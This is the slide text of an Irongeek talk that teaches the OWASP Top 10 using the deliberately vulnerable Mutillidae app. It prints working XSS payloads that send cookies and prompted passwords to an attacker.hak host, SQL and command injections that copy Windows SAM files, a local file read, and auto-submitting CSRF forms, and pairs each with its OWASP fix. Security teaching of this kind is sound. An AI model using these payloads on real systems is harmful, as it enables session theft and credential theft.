http://Irongeek.com

Adrian Crenshaw

http://Irongeek.com

I run Irongeek.com

I have an interest in InfoSeceducation

I don’t know everything - I’m just a geek with time on my hands

I’m also not a professional web developer, creating crappy code was easy or me.

So why listen to me? Sometimes it takes a noob to teach a noob.

http://Irongeek.com

OWASP Top 10http://www.owasp.org/index.php/OWASP_Top_Ten_Project(As a side note, I’ve copied quite of few of their descriptions and fixes into this presentation)

Mutillidaehttp://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

Ok, but what are those?

http://Irongeek.com

The 2007 list includes:

A1 - Cross Site Scripting (XSS)

A2 - Injection Flaws

A3 - Malicious File Execution

A4 - Insecure Direct Object Reference

A5 - Cross Site Request Forgery (CSRF)

A6 - Information Leakage and Improper Error Handling

A7 - Broken Authentication and Session Management

A8 - Insecure Cryptographic Storage

A9 - Insecure Communications

A10 - Failure to Restrict URL Access

The OWASP Top Ten represents a broad consensus about what the most critical

web application security flaws are.

http://Irongeek.com

A teaching tool for illustrating the OWASP 10

Written in PHP/MySQL

Meant to be simpler than WebGoat

Simple to exploit, just to get the concept across

Easy to reset

Includes a “Tips” function to help the student

http://Irongeek.com

1. Download Mutillidaehttp://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

2. Grab XAMPP Lite and install ithttp://www.apachefriends.org/en/xampp.html

3. Put the Mutillidae files in \htdocs

4. May want to edit xampplite\apache\conf\httpd.conf and set “Listen 127.0.0.1:80 “

http://Irongeek.com

XSS flaws occur whenever an

application takes user supplied data and

sends it to a web browser without first

validating or encoding that content. XSS

allows attackers to execute script in the

victim's browser which can hijack user

sessions, deface web sites, possibly

introduce worms, etc.

http://Irongeek.com

Simple:<script>alert("XSS");</script>

Page Redirect:<script>window.location = "http://www.irongeek.com/"</script>

Cookie Stealing:<script>new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);</script>

http://Irongeek.com

Simple:<script>alert("XSS");</script>

Page Redirect:<script>window.location = "http://www.irongeek.com/"</script>

Cookie Stealing:<script>new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);</script>

Password Con:<script>username=prompt('Please enter your username',' ');password=prompt('Please enter your password',' ');document.write("<imgsrc=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");</script>

http://Irongeek.com

External Javascript:<script src="http://ha.ckers.org/xss.js"></script>

Hot BeEF Injection:<script language='Javascript'src='http://localhost/beef/hook/beefmagic.js.php'></script>

How about the User Agent string?

http://Irongeek.com

Mangle XSS to bypass filters: http://ha.ckers.org/xss.html

BeEF browser exploitation frameworkhttp://www.bindshell.net/tools/beef

XSS Me Firefox pluginhttps://addons.mozilla.org/en-US/firefox/addon/7598

Exotic Injection Vectors http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors

http://Irongeek.com

Input validation.

Strong output encoding. htmlspecialchars()

Specify the output encoding.

Do not use "blacklist" validation to detect XSS in input or to encode output.

Watch out for canonicalization errors.

http://Irongeek.com

Injection flaws, particularly SQL

injection, are common in web applications.

Injection occurs when user-supplied data is

sent to an interpreter as part of a command

or query. The attacker's hostile data tricks

the interpreter into executing unintended

commands or changing data.

http://Irongeek.com

The Code:

“SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password).”’”

or

echo shell_exec("nslookup " . $targethost);'“

Expected to fill in the string to:

SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’

or

Nslookup irongeek.com

But what if the person injected:

SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or 1=1 -- ’

or

Nslookup irongeek.com && del *.*

http://Irongeek.com

Simple SQL Injection:' or 1=1 --

Wish I could do this, but can't stack in MySQL/PHP '; DROP TABLE owasp10; --

Command Injections:&& dir&& wmic process list&& wmic useraccount list&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak

(use ; as a separator if you are running this on Linux)

http://Irongeek.com

SQL Injection Cheat Sheethttp://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

SQL Injection Attacks by Example http://unixwiz.net/techtips/sql-injection.html

Command line Kung Fuhttp://blog.commandlinekungfu.com/

http://Irongeek.com

Input validation.

Use strongly typed parameterized query APIs (bound parameters).

Enforce least privilege.

Avoid detailed error messages.

Show care when using stored procedures.

Do not use dynamic query interfaces.

Do not use simple escaping functions.

Watch out for canonicalization errors.

http://Irongeek.com

Code vulnerable to remote file

inclusion (RFI) allows attackers to include

hostile code and data, resulting in

devastating attacks, such as total server

compromise. Malicious file execution

attacks affect PHP, XML and any framework

which accepts filenames or files from users.

http://Irongeek.com

Grabbing a local file:http://target.hak/index.php?page=source-viewer.php&php_file_name=config.inc

Tamper Data, POST data and an inadvertent proxy

http://Irongeek.com

Tamper Data Firefox Pluginhttps://addons.mozilla.org/en-US/firefox/addon/966

Paroshttp://www.parosproxy.org/index.shtml

WebScarabhttp://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

http://Irongeek.com

Strongly validate user input using "accept known good" as a strategy

Add firewall rules to prevent web servers making new connections to external web sites and internal systems.

Consider implementing a chroot jail or other sand box mechanisms.

# PHP: Disable allow_url_fopen and allow_url_include in php.ini and consider .building PHP locally to not include this functionality.

# PHP: Disable register_globals and use E_STRICT to find uninitialized variables.

# PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.

http://Irongeek.com

A direct object reference occurs when

a developer exposes a reference to an

internal implementation object, such as a

file, directory, database record, or key, as a

URL or form parameter. Attackers can

manipulate those references to access

other objects without authorization.

http://Irongeek.com

You already saw it with the malicious file include demo.

http://Irongeek.com

Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.

Validate any private object references extensively with an "accept known good" approach.

Verify authorization to all referenced objects.

http://Irongeek.com

A CSRF attack forces a logged-on

victim's browser to send a pre-authenticated

request to a vulnerable web application,

which then forces the victim's browser to

perform a hostile action to the benefit of the

attacker. CSRF can be as powerful as the

web application that it attacks.

http://Irongeek.com

Target Web App

Client

Website the

attacker controls

1. Session established

with web app via a

cookie. (already logged

in)

2. At some later point,

content that the

attacker controls is

requested.

3. Attacker serves up

content that asks

client’s browser to

make a request.

4. Client makes request,

and since it already has

a session cookie the

request is honored.

http://Irongeek.com

Let visit a page with this lovely link:<img src="http://target.hak/index.php?page=add-to-your-

blog.php&input_from_form=hi%20there%20monkeyboy">

Don’t want to use a bad image? Try an Iframe:<iframe src="http://target.hak/index.php?page=add-to-your-

blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px; height:0px; border: 0px"></iframe>

Can’t use the GET method? Try something like:<html> <body><form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"><input type='hidden' name='input_from_form' value="Test of of auto submitted form."></form><script>document.csrfform.submit()</script> </body></html>

http://Irongeek.com

CSRF Flaws Found On Major Websites, Including a Bank http://it.slashdot.org/article.pl?sid=08/09/30/0136219

CSRF Home Router Funhttp://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/

CSRF in Gmailhttp://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

http://Irongeek.com

For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.

Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point)

POST alone is insufficient protection.

Consider adding Captchas and extra sessions values as hidden form elements.

http://Irongeek.com

Deliberately Insecure Web Applications For Learning Web App Security http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security

http://Irongeek.com

SamuraiWTFhttp://samurai.inguardians.com/

OWASP Live CDhttp://www.owasp.org/index.php/Category:OWASP_Live_CD_Project

BackTrackhttp://www.remote-exploit.org/backtrack.html

http://Irongeek.com

Free ISSA classes

ISSA Meetinghttp://issa-kentuckiana.org/

Louisville Infosechttp://www.louisvilleinfosec.com/

Phreaknic/Notacon/Outerz0nehttp://phreaknic.infohttp://notacon.org/http://www.outerz0ne.org/

http://Irongeek.com

42